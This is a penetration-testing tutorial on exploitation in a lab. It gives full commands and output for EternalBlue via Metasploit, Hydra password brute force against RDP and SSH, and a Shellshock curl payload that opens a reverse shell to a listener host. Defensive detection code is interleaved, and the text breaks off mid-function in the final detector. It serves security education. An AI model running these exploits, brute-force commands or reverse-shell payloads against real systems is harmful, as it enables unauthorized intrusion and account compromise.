Exploitation - Breaking Through the Digital Door🚪
Welcome back to our penetration testing series! 👋 If you’ve been following along, you’ve already learned how to identify live systems and discover open ports through enumeration. Now comes the most exciting part – exploitation. This is where theory meets practice, and we actually attempt to gain access to target systems.
What is Exploitation? 🤔
Think of exploitation as using a key you’ve found (vulnerability) to open a door (system access). During the enumeration phase, we identified potential weaknesses – maybe an outdated service, default credentials, or a known vulnerability. Now, we’ll learn how to leverage these findings to gain actual access to systems.
In Simple Terms: Imagine you’re a locksmith helping someone who’s locked out of their house. Exploitation is like finding the right technique to open the lock - maybe you use a spare key they forgot about (default passwords), or you find a window that’s been left open (unpatched vulnerability). The goal is to help them get back inside safely!
🔍 Quick Refresher: If you’re new to penetration testing, think of it as “ethical hacking” - we’re the good guys helping organizations find security holes before the bad guys do! It’s like being a digital security guard who tests all the locks and alarms.
⚠️ Important Note: This guide is for educational purposes and authorized testing only. Never attempt these techniques on systems you don’t own or have explicit permission to test.
Understanding the Exploitation Process 📋
Before diving into specific techniques, let’s understand what happens during exploitation:
- Target Selection: Based on your enumeration results, you choose which vulnerability to exploit
- Exploit Preparation: You prepare your tools and set up listeners if needed
- Execution: You launch the exploit against the target
- Access Verification: You confirm successful exploitation and document your access level
🤓 What is Enumeration? Enumeration is like being a detective gathering clues! In the previous stages of penetration testing, we “enumerated” (discovered and listed) all the services, ports, and potential vulnerabilities on our target systems. It’s like walking around a building and noting all the doors, windows, security cameras, and anything else that might be useful to know. We’re not breaking in yet - just gathering information!
🤓 What is a Vulnerability? A vulnerability is like a weakness or flaw in a system - think of it as a broken lock, an open window, or a guard who takes predictable breaks. In cybersecurity, it’s any weakness that could potentially be exploited to gain unauthorized access or cause harm.
🤓 What are CVE Numbers? CVE stands for “Common Vulnerabilities and Exposures” - think of it like a license plate for security flaws! Each discovered vulnerability gets a unique CVE number (like CVE-2017-0144 for EternalBlue). It’s like having a filing system so security professionals worldwide can talk about the same vulnerability using the same reference number.
Setting Up Your Environment 🛠️
Before we start exploiting, ensure you have:
- Kali Linux or similar penetration testing distribution
- Metasploit Framework installed
- Target systems (use vulnerable VMs like Metasploitable, DVWA, or HackTheBox)
- Network connectivity to your targets
🤓 Beginner’s Corner: Understanding the Tools
What is Kali Linux? 🐉 Kali Linux is like a Swiss Army knife for cybersecurity professionals! It’s a special version of Linux that comes pre-loaded with hundreds of security testing tools. Think of it as your hacker’s toolkit - everything you need is already installed and ready to go.
What is Metasploit? 🎯 Metasploit is like having a master key collection for digital locks. It’s a framework that contains thousands of pre-built exploits (think “lock-picking techniques”) that work against known vulnerabilities. Instead of writing complex code from scratch, you can use Metasploit’s ready-made tools!
What are VMs (Virtual Machines)? 💻 Virtual Machines are like having multiple computers inside your computer! You can run a “virtual” Windows or Linux system for practice without affecting your main computer. It’s like having a sandbox where you can safely break things and learn.
Common Exploitation Techniques 🎯
Let’s explore practical exploitation methods for both Windows and Linux systems, starting with the basics.
🌐 Understanding Network Services (The Digital Doors)
Before we start picking locks, let’s understand what we’re dealing with! Think of network services as different types of doors and windows on a digital house:
Service | Port | What It Does | Why It Matters |
---|---|---|---|
SMB 🏠 | 139/445 | Windows file and printer sharing | Often has security holes on older systems |
SSH 🔐 | 22 | Remote control of Linux/Unix systems | Direct access to the computer’s “brain” |
FTP 📁 | 21 | File transfers between computers | Often allows anonymous access |
RDP 🖥️ | 3389 | Remote control of Windows computers | Like having physical computer access |
🔍 Understanding Ports and Scanning
Now that we know what these services do, let’s talk about how to find them! 🕵️♂️
What are Ports? 🚪 Think of ports like apartment numbers in a building. Each service (like SSH, FTP, etc.) lives at a specific “apartment number” (port). Common ports include:
- Port 22: SSH (the secure remote access door)
- Port 80: HTTP (regular websites)
- Port 443: HTTPS (secure websites)
- Port 21: FTP (file transfer)
- Port 3389: RDP (remote desktop)
What is Nmap? 🗺️ Nmap is like a digital reconnaissance tool - it knocks on all the doors (ports) to see which ones are open and what services are running behind them. It’s like being a detective gathering information about a building before planning your entry.
Now that we understand the basics of network services and how to find them, let’s dive into the exciting part - actually exploiting these services! We’ll start with Windows systems since they’re commonly found in corporate environments. 🏢
🔐 Windows Exploitation Techniques
1. Exploiting SMB with EternalBlue (MS17-010)
EternalBlue is perhaps the most famous Windows exploit, affecting older unpatched systems. It targets a vulnerability in the SMB (Server Message Block) protocol we just learned about!
First, check if the target is vulnerable:
```bash
# Use nmap to check for the vulnerability
nmap -p 445 --script smb-vuln-ms17-010 192.168.1.100
```
Example output if vulnerable:
```text
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-15 10:30 EST
Nmap scan report for 192.168.1.100
Host is up (0.00050s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0144
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
```
Understanding the vulnerability:
- Affects: Windows Vista, 7, 8.1, 10, Server 2008, 2012, 2016
- Impact: Remote code execution with SYSTEM privileges
- Why it works: Buffer overflow in SMBv1 implementation
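As an added example (not code from the original post), here is a small Python parser that turns the `smb-vuln-ms17-010` output above into a patch list, so that a scan of a whole subnet becomes a remediation queue. The scan text inside is constructed; the example assumes nmap's default behaviour of printing nothing for a host the vuln script did not flag.

```python
"""Turn nmap smb-vuln-ms17-010 output into a remediation list (added example).

nmap prints the NSE script's findings under "Host script results:" with each
script line prefixed by "| " (the last one by "|_"). This parser collects, per
host, whether the script reported "State: VULNERABLE", the CVE ids it cited and
the risk factor. The sample below is constructed for this example; the second
host shows nmap's default of printing no script output when nothing was found.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

SAMPLE_SCAN = """\
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-15 10:30 EST
Nmap scan report for 192.168.1.100
Host is up (0.00050s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0144
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|       servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap scan report for 192.168.1.101
Host is up (0.00044s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap done: 2 IP addresses (2 hosts up) scanned in 1.42 seconds
"""


@dataclass
class HostResult:
    ip: str
    vulnerable: bool = False
    cves: List[str] = field(default_factory=list)
    risk: str = ""


HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
STATE_RE = re.compile(r"\bState:\s*(\w+)")
RISK_RE = re.compile(r"\bRisk factor:\s*(\w+)")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_scan(text: str) -> List[HostResult]:
    """Parse nmap's normal text output into one record per scanned host."""
    hosts: List[HostResult] = []
    current: Optional[HostResult] = None
    for raw in text.splitlines():
        m = HOST_RE.match(raw)
        if m:
            current = HostResult(ip=m.group(1))
            hosts.append(current)
            continue
        # Only NSE script lines (prefixed with "|") carry vulnerability details.
        if current is None or not raw.startswith("|"):
            continue
        line = raw.lstrip("|_ ")
        m = STATE_RE.search(line)
        if m:
            current.vulnerable = m.group(1).upper() == "VULNERABLE"
        m = RISK_RE.search(line)
        if m:
            current.risk = m.group(1).upper()
        for cve in CVE_RE.findall(line):  # ids appear in "IDs:" and in reference URLs
            if cve not in current.cves:
                current.cves.append(cve)
    return hosts


def remediation_list(text: str) -> List[Tuple[str, List[str], str]]:
    """(ip, cves, risk) for every host the script marked VULNERABLE."""
    return [(h.ip, h.cves, h.risk) for h in parse_scan(text) if h.vulnerable]


if __name__ == "__main__":
    for ip, cves, risk in remediation_list(SAMPLE_SCAN):
        print(f"{ip}: {', '.join(cves)} risk={risk} -> apply MS17-010, disable SMBv1")
```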
🤓 What’s a Buffer Overflow? Think of it like overfilling a coffee cup. In programming, a “buffer” is like a container that holds data. When you pour too much data into it (like overfilling the cup), it spills over and can overwrite important parts of the computer’s memory. Hackers can carefully control this “spill” to make the computer run their code instead of the intended program! It’s like tricking the coffee machine into making tea instead. ☕➡️🍵
Exploitation using Metasploit:
```bash
# Start Metasploit
msfconsole
```
Metasploit startup output:
```text
https://metasploit.com
=[ metasploit v6.3.4-dev ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use sessions -1 to interact with the
last opened session
msf6 >
```
```text
# Search for the exploit
msf6 > search eternalblue
# Use the exploit module
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# View required options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
```
Options output:
```text
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name           Current Setting  Required  Description
----           ---------------  --------  -----------
RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT          445              yes       The target port (TCP)
SMBDomain      .                no        (Optional) The Windows domain to use for authentication
SMBPass                         no        (Optional) The password for the specified username
SMBUser                         no        (Optional) The username to authenticate as
VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     192.168.1.50     yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port
```
```text
# Set the target IP
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
# Set your IP (for the reverse connection)
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.50
LHOST => 192.168.1.50
# Run the exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
```
Successful exploitation output:
```text
[*] Started reverse TCP handler on 192.168.1.50:4444
[*] 192.168.1.100:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.100:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.1.100:445 - The target is vulnerable.
[*] 192.168.1.100:445 - Connecting to target for exploitation.
[+] 192.168.1.100:445 - Connection established for exploitation.
[+] 192.168.1.100:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.100:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.1.100:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.1.100:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 192.168.1.100:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 192.168.1.100:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.100:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.100:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.100:445 - Starting non-paged pool grooming
[+] 192.168.1.100:445 - Sending SMBv2 buffers
[+] 192.168.1.100:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.100:445 - Sending final SMBv2 buffers.
[*] 192.168.1.100:445 - Sending last fragment of exploit packet!
[*] 192.168.1.100:445 - Receiving response from exploit packet
[+] 192.168.1.100:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.100:445 - Sending egg to corrupted connection.
[*] 192.168.1.100:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.50:4444 -> 192.168.1.100:49158) at 2024-01-15 10:32:41 -0500
meterpreter >
```
What happens behind the scenes:
- Metasploit sends specially crafted SMB packets
- The buffer overflow occurs, allowing code execution
- A reverse shell payload is executed
- The target connects back to your machine
Great! We’ve just seen how a complex exploit like EternalBlue works. But sometimes the simplest approach is the most effective. Let’s look at exploiting systems that use weak or default passwords - you’d be amazed how often this works! 🤦♂️
2. Exploiting Windows with Default/Weak Credentials 🔑
Many Windows systems, especially in lab environments, use default or weak credentials.
🤓 What are Credentials? Credentials are like your digital ID card - they’re the username and password combination that proves you’re allowed to access a system. “Default credentials” are like leaving the default password on your WiFi router - they’re the passwords that come pre-set and many people never change them!
What is Brute Force? 🔨 Brute force is like trying every possible key on a keyring until one works! In cybersecurity, it means automatically trying thousands of username/password combinations until you find the right one. It’s not elegant, but it works surprisingly often because people use weak passwords!
What is Hydra? 🐉 Hydra is like a super-fast lock picker that can try thousands of password combinations per minute. It’s named after the mythical creature with multiple heads - it can attack multiple services and try multiple passwords simultaneously!
RDP (Remote Desktop Protocol) Brute Force:
```bash
# First, check if RDP is open (port 3389)
nmap -p 3389 192.168.1.100
```
RDP scan output:
```text
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-15 10:35 EST
Nmap scan report for 192.168.1.100
Host is up (0.00048s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds
```
```bash
# Use hydra for brute force
hydra -l administrator -P /usr/share/wordlists/rockyou.txt rdp://192.168.1.100
```
Hydra brute force output:
```text
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-15 10:36:22
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking rdp://192.168.1.100:3389/
[3389][rdp] host: 192.168.1.100 login: administrator password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-15 10:36:45
```
If successful, connect using:
```bash
# Using xfreerdp
xfreerdp /u:administrator /p:password /v:192.168.1.100
```
Successful RDP connection output:
```text
[10:37:12:234] [1234:1235] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[10:37:12:234] [1234:1235] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr
[10:37:12:234] [1234:1235] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd
[10:37:12:234] [1234:1235] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
[10:37:12:345] [1234:1235] [INFO][com.freerdp.primitives] - primitives autodetect, using optimized
[10:37:12:456] [1234:1235] [INFO][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex resetting error state
[10:37:12:567] [1234:1235] [INFO][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex resetting error state
[10:37:12:678] [1234:1235] [INFO][com.freerdp.crypto] - creating directory /home/kali/.config/freerdp
[10:37:12:789] [1234:1235] [INFO][com.freerdp.crypto] - creating directory /home/kali/.config/freerdp/certs
[10:37:12:890] [1234:1235] [INFO][com.freerdp.crypto] - created directory [/home/kali/.config/freerdp/certs]
[10:37:13:001] [1234:1235] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0
[10:37:13:001] [1234:1235] [WARN][com.freerdp.crypto] - CN = WIN-ABCD1234567
[10:37:13:001] [1234:1235] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[10:37:13:001] [1234:1235] [ERROR][com.freerdp.crypto] - @ WARNING: CERTIFICATE NAME MISMATCH! @
[10:37:13:001] [1234:1235] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[10:37:13:001] [1234:1235] [ERROR][com.freerdp.crypto] - The hostname used for this connection (192.168.1.100:3389)
[10:37:13:001] [1234:1235] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[10:37:13:001] [1234:1235] [ERROR][com.freerdp.crypto] - Common Name (CN):
[10:37:13:001] [1234:1235] [ERROR][com.freerdp.crypto] - WIN-ABCD1234567
[10:37:13:001] [1234:1235] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 192.168.1.100:3389 (RDP-Server):
Common Name: WIN-ABCD1234567
Subject: CN = WIN-ABCD1234567
Issuer: CN = WIN-ABCD1234567
Thumbprint: 01:23:45:67:89:ab:cd:ef:01:23:45:67:89:ab:cd:ef:01:23:45:67:89:ab:cd:ef:01:23:45:67:89:ab:cd:ef
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) Y
```
Then a Windows desktop window opens showing successful access! 🎉
🐧 Linux Exploitation Techniques
1. Exploiting Shellshock Vulnerability 🐚
Shellshock affects systems running vulnerable versions of Bash, often through CGI scripts.
🤓 What is Bash? Bash is like the “command interpreter” on Linux/Unix systems - it’s the program that understands and executes commands when you type them. Think of it as the “brain” that processes your text commands and makes the computer do what you want!
🤓 What is CGI? CGI (Common Gateway Interface) is like a translator between web servers and programs. When you fill out a form on a website, CGI helps the web server run a program to process your information. It’s like having a middleman who takes your restaurant order and tells the kitchen what to cook!
🤓 What is Shellshock? Shellshock is a vulnerability where we can trick Bash into running extra commands by hiding them in what looks like harmless information. It’s like sneaking a secret note inside a regular letter - the system reads the “letter” but also accidentally follows the hidden instructions!
Testing for Shellshock:
```bash
# First, identify web servers with CGI
nmap -sV -p 80,443 192.168.1.200
```
Web server scan output:
```text
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-15 10:40 EST
Nmap scan report for 192.168.1.200
Host is up (0.00042s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
```
```bash
# Manual test using curl
curl -A "() { :; }; echo 'Vulnerable to Shellshock'" http://192.168.1.200/cgi-bin/test.cgi
```
Shellshock test output:
```html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>CGI Test</h1>
<p>Your User-Agent: () { :; }; echo 'Vulnerable to Shellshock'</p>
Vulnerable to Shellshock
</body></html>
```
Exploiting Shellshock for a reverse shell:
```bash
# Step 1: Set up a listener on your machine
nc -lvnp 4444
```
Netcat listener output:
```text
listening on [any] 4444 ...
```
```bash
# Step 2: In another terminal, send the exploit
curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/192.168.1.50/4444 0>&1" \
  http://192.168.1.200/cgi-bin/test.cgi
```
Shell received output:
```text
listening on [any] 4444 ...
connect to [192.168.1.50] from (UNKNOWN) [192.168.1.200] 45678
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/usr/lib/cgi-bin$ whoami
whoami
www-data
www-data@ubuntu:/usr/lib/cgi-bin$
```
Understanding the exploit:
- The vulnerability exists in how Bash processes environment variables
- We inject commands after the function definition
- The server executes our injected command with its privileges
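The other side of the Shellshock test above, as an added example that is not part of the original post: since CGI copies request headers into the environment variables Bash imported function definitions from, a defender can look for the `() {` function prefix in web logs and at the WAF. The Apache combined-format log lines below are constructed for this example.

```python
"""Flag Shellshock probes in Apache access logs and request headers (added example).

CGI exports request headers (User-Agent, Referer, the query string) as
environment variables, and a vulnerable Bash ran whatever followed the "};"
of a function definition stored in one of them. The tell-tale is a header
value that starts with the function-definition prefix "() {". The log lines
below are constructed in Apache "combined" format.
"""
import re
from typing import Dict, List, Optional, Tuple

# The prefix Bash treated as an imported function: "()" then "{" (spaces optional).
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache combined format; quoted fields may contain \" escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Constructed sample: a probe in User-Agent, normal traffic, a probe in Referer,
# and a junk line that must not break the scan.
SAMPLE_LOG = [
    '192.168.1.50 - - [15/Jan/2024:10:41:03 -0500] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '200 212 "-" "() { :; }; echo \'Vulnerable to Shellshock\'"',
    '10.0.0.7 - - [15/Jan/2024:10:41:09 -0500] "GET /index.html HTTP/1.1" '
    '200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/121.0"',
    '192.168.1.50 - - [15/Jan/2024:10:42:17 -0500] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '200 0 "() { :;}; /usr/bin/id" "curl/8.4.0"',
    'not a log line at all',
]


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_probes(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (source ip, request line, field) for each line carrying the prefix."""
    hits: List[Tuple[str, str, str]] = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue  # unparseable line: in production, count it and move on
        for fld in ("request", "referer", "ua"):
            if SHELLSHOCK_RE.search(rec[fld]):
                hits.append((rec["ip"], rec["request"], fld))
                break
    return hits


def inspect_headers(headers: Dict[str, str]) -> List[str]:
    """Names of inbound headers carrying the prefix; a WAF rejects the request if any."""
    return [name for name, value in headers.items() if SHELLSHOCK_RE.search(value)]


if __name__ == "__main__":
    for ip, request, fld in find_shellshock_probes(SAMPLE_LOG):
        print(f"shellshock probe from {ip} in {fld}: {request}")
```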
Shellshock is a great example of how web applications can be vulnerable, but let’s look at a more direct approach - targeting SSH services. SSH is incredibly common on Linux systems and is often a prime target for attackers! 🎯
2. Exploiting SSH Services 🔐
SSH is often a prime target, especially with weak credentials.
SSH Enumeration and Exploitation:
```bash
# Step 1: Enumerate SSH version and check for vulnerabilities
nmap -sV -p 22 --script ssh* 192.168.1.200
```
SSH enumeration output:
```text
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-15 10:45 EST
Nmap scan report for 192.168.1.200
Host is up (0.00035s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:f0:5e:5f:a6:26:3d:e0:3e:7d:2a:87:42:ef:7a:bc (DSA)
| 2048 32:b3:96:52:cc:8c:41:3a:54:df:74:14:c4:53:37:28 (RSA)
|_ 256 4f:88:aa:8b:59:ce:9c:6b:b7:aa:5c:67:24:d3:9a:39 (ECDSA)
| ssh2-enum-algos:
| kex_algorithms: (9)
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group-exchange-sha1
| diffie-hellman-group14-sha1
| diffie-hellman-group1-sha1
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| server_host_key_algorithms: (3)
| ssh-rsa
| ssh-dss
| ecdsa-sha2-nistp256
| encryption_algorithms: (16)
| aes128-ctr
| aes192-ctr
| aes256-ctr
| arcfour256
| arcfour128
| aes128-cbc
| 3des-cbc
| blowfish-cbc
| cast128-cbc
| aes192-cbc
| aes256-cbc
| arcfour
| rijndael-cbc@lysator.liu.se
| aes128-ctr
| aes192-ctr
| aes256-ctr
| mac_algorithms: (13)
| hmac-md5
| hmac-sha1
| umac-64@openssh.com
| hmac-ripemd160
| hmac-ripemd160@openssh.com
| hmac-sha1-96
| hmac-md5-96
| hmac-sha2-256
| hmac-sha2-256-96
| hmac-sha2-512
| hmac-sha2-512-96
| hmac-sha1-etm@openssh.com
| hmac-sha1-96-etm@openssh.com
| compression_algorithms: (2)
| none
| zlib@openssh.com
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
```bash
# Step 2: Try common username combinations
hydra -L /usr/share/wordlists/metasploit/unix_users.txt \
  -P /usr/share/wordlists/metasploit/unix_passwords.txt \
  ssh://192.168.1.200
```
Hydra SSH brute force output:
```text
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-15 10:46:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1009 login tries (l:109/p:109), ~64 tries per task
[DATA] attacking ssh://192.168.1.200:22/
[22][ssh] host: 192.168.1.200 login: msfadmin password: msfadmin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-15 10:46:32
```
Manual SSH connection:
```bash
# If credentials are found
ssh msfadmin@192.168.1.200
```
SSH login output:
```text
The authenticity of host '192.168.1.200 (192.168.1.200)' can't be established.
ECDSA key fingerprint is SHA256:4f:88:aa:8b:59:ce:9c:6b:b7:aa:5c:67:24:d3:9a:39.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.200' (ECDSA) to the list of known hosts.
msfadmin@192.168.1.200's password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
msfadmin@metasploitable:~$
```
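What the Hydra runs above look like from the target's side, as an added example that is not part of the original post: the SSH brute force leaves a burst of "Failed password" lines from one source, cycling through usernames, followed by an "Accepted password" from the same source if a guess landed. The detector below parses constructed syslog-style sshd lines, counts failures per source in a sliding window and reports whether a flagged source then got in; the same counter can be fed Windows failed-logon audit events (event id 4625) to cover the RDP attack from earlier.

```python
"""Detect the password-guessing burst a Hydra run leaves in sshd logs (added example).

On the target, the brute force shows up as many "Failed password" lines from
one source address in a short time, usually with a different username each
time, and then (if it worked) an "Accepted password" from that same address.
The log lines below are constructed syslog-style sshd entries.
"""
import re
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Set, Tuple

SAMPLE_AUTH_LOG = """\
Jan 15 10:46:15 metasploitable sshd[2231]: Failed password for invalid user admin from 192.168.1.50 port 40212 ssh2
Jan 15 10:46:16 metasploitable sshd[2233]: Failed password for invalid user guest from 192.168.1.50 port 40214 ssh2
Jan 15 10:46:16 metasploitable sshd[2235]: Failed password for root from 192.168.1.50 port 40216 ssh2
Jan 15 10:46:17 metasploitable sshd[2237]: Failed password for invalid user test from 192.168.1.50 port 40218 ssh2
Jan 15 10:46:18 metasploitable sshd[2239]: Failed password for invalid user user from 192.168.1.50 port 40220 ssh2
Jan 15 10:46:20 metasploitable sshd[2241]: Failed password for msfadmin from 192.168.1.50 port 40222 ssh2
Jan 15 10:46:32 metasploitable sshd[2243]: Accepted password for msfadmin from 192.168.1.50 port 40224 ssh2
Jan 15 10:47:01 metasploitable sshd[2250]: Failed password for alice from 10.0.0.9 port 51000 ssh2
Jan 15 10:47:09 metasploitable sshd[2252]: Accepted password for alice from 10.0.0.9 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)

Event = Tuple[datetime, str, str, bool]  # (time, source ip, username, accepted?)


@dataclass
class Alert:
    ip: str
    failures: int
    usernames: List[str]
    succeeded_after: bool = False  # a success after the burst means a likely compromise


def parse_sshd(text: str, year: int = 2024) -> List[Event]:
    """Parse sshd auth lines; syslog omits the year, so the caller supplies it."""
    events: List[Event] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        stamp = " ".join(m["ts"].split())  # syslog pads single-digit days with a space
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["result"] == "Accepted"))
    return events


def detect_bruteforce(events: List[Event], threshold: int = 5,
                      window: timedelta = timedelta(seconds=60)) -> Dict[str, Alert]:
    """Sources with at least `threshold` failures inside any `window`, by source ip."""
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
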